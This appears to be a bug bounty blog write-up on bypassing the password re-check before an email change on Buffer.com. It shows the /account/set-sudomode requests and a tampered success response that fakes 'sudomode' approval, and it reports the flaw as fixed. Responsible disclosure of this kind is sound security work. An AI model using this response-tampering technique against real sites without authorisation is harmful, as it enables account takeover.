Buffer Authentication Bypass

Buffer Authentication Bypass

Dipak kumar Das's photo
Dipak kumar Das

Hi everyone , here is one of my finding on Buffer.com . Where i managed to bypass the authentication

So basically the authentication work flow is like below

  • To change account email user need to provide the current account password
  • If the password is correct then application let you to change the account email

So lets start

when user want to change their account email id the app ask for current password like below

so here i wanted to test the response for both correct and incorrect password response

so here is the request

*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword**

so the response for wrong password is below

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}**

so here is the response for correct password

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}**

if you observe both response just the notice_message and sudomode added in the correct password response
so here i used a wrong password let say 123456

Request is like below
*POST /account/set-sudomode HTTP/1.1 200 OK
Date: \*****
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456**

Note the csrf _token value in the request that is :
uyr37832rhehr8he7372829hefdgdf

Response

*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"**uyr37832rhehr8he7372829hefdgdf"}

Modify the response to
*HTTP/1.1 200 OK
Date: Mon,\****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudome":"true","csrf_token":"**uyr37832rhehr8he7372829hefdgdf**"}
Boom now it will show successfully authenticated and you can change your email
So here is the video proof of concept

Status: Fixed
Bounty Rewarded

Did you find this article valuable?

Support Dipak kumar Das by becoming a sponsor. Any amount is appreciated!